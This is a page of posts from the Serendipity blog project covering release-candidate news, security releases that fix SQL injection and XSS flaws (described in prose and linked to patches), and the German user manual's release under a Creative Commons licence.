Serendipity – The official Serendipity blog

The problematic 1.7-rc1 has now been superseded with a new 1.7-rc2 release candidate. The original announcement has been updated to reflect the changes.

The 1.7-rc1 that has been published today has an issue with older Serendipity plugins existing on prior installations, preventing Serendipity 1.7 to operate properly. While we fix this issue for an upcoming rc2, this problematic rc1 has been removed at this point.

Hey!

Finally I've been to a small West-Coast-Trip to the USA. I also visited Las Vegas, and guess what I found...

So there we have the place for our meetup; there's one in New York as well... ;-)

Best regards, Garvin

UPDATED: 2012-05-22 12:00 to clarify impact.

Good and bad things come in doubles, it seems. We are sorry to inform you that another security issue in Serendipity has been found by the High-Tech Bridge SA Security Research Lab (Advisory HTB23092). This issue has been reported today at 11:27 and we're happy to provide a quick fix for that.

You can either download the full 1.6.2 release, or apply this simple fix to the file include/functions_trackbacks.inc.php: diff on github.

The error here is that input is not properly validated and can be used (when magic_quotes_gpc is off) to inject SQL code to a SQL query; since our DB layer does not execute multiple statements, and the involved SQL query is not used to produce output code. Thanks to Pawel Golen it was made clear to us that this issue can in fact be used to remotely access the database through blind sql injection attacks (this method however is really slow and creates a lot of traffic, since only using 0/1 as a result of the exploit will mean a lot of queries to deduce the content). Thus you should definitely upgrade your installation.

Serendipity is an open-source based product with no specific funding, so we depend on nice people like High-Tech Bridge, Stefan Schurtz, Hanno Böck and all the others of the past to report issues to us. In turn we promise to fix them as quickly and transparently as possible.

Serendipity 1.6.1 has just been released. As usual you can simply download from s9y.org, extract the archive, upload it to your webspace and accept the upgrader when visiting your blog.

This release mainly addresses two security issues found by Stefan Schurtz (thanks a lot, again!). One is a XSS issue in the media database panel, the other an SQL injection in the media database section. Both issues can only be exploited if you are logged in to your blog and you click a specially crafted link. The SQL injection cannot be used to extract sensitive information from the database or delete data.

Either way you are urged to upgrade your Blog to the latest version. Development versions of 2.0 and 1.7 on github have these bugs fixed as well.

Other bugfixes in this version include:

• Updated spamblock plugin for better wordfiltering on specific scenarios
• Fixed draft/future entries preview links in backend
• Fixed an issue where template-specific configuration options were not overwritten by the new global ones

You might also want to check out our quite stable 1.7 development version which uses Smarty3, or even our 2.0 development version which contains major rewrites so that Smarty is used in the backend!

Das deutsche "Serendipity Handbuch" OpenSourcePress wurde vor einiger Zeit veröffentlicht, und der Verlag war so nett, die Rechte an den Buchinhalten zurückzuerhalten (auch dank des tatkräftigen Engagements von Dirk Deimeke und natürlich unserer tollen Community).

Das bedeutet, die Inhalte wurden nun unter einer CC-BY-NC-SA Lizenz veröffentlicht und können von der Community (also: EUCH!) frei gelesen, erweitert und möglicherweise auch übersetzt werden. Die meisten Dinge des Handbuchs finden auch heute noch Anwendung, aber es gibt genügend Spielraum für Verbesserungen.

Schaut euch das ganze hier an: Das Serendipity Handbuch. Die Dateien liegen im LaTeX format vor, ihr benötigt daher eine funktionierende LaTeX-Umgebung, um die Dateien kompilieren zu können. Die .tex-Dateien sind jedoch im Klartextformat, also keine fremde Scheu. :-)

Derzeit überlegen wir, in welchem Format das ganze endgültig und sinnvoll für die Benutzer und Mithelfer hinterlegt werden wird. Gerne diskutieren wir hierüber mit euch im Forum.

The german "Serendipity Manual" was published by OpenSourcePress some time ago. They were so kind to revert the publishing license back to our project (thanks to the great work of Dirk Deimeke and kind people like you), so that we can now publish it under a CC-BY-NC-SA license, and let the community (read: YOU!) be able to read the documentation for free, contribute to it, and hopefully even translate it to other languages. Many aspects of the book are still up to date, but surely many improvements can now be made.

Check it out here: The Serendipity Book. The files are written in LaTeX format, so you need a working LaTeX environment to compile it as PDF or other variants, if you like. We are currently working out the best format to use in the future; if you want, you can help us discuss this on the forums.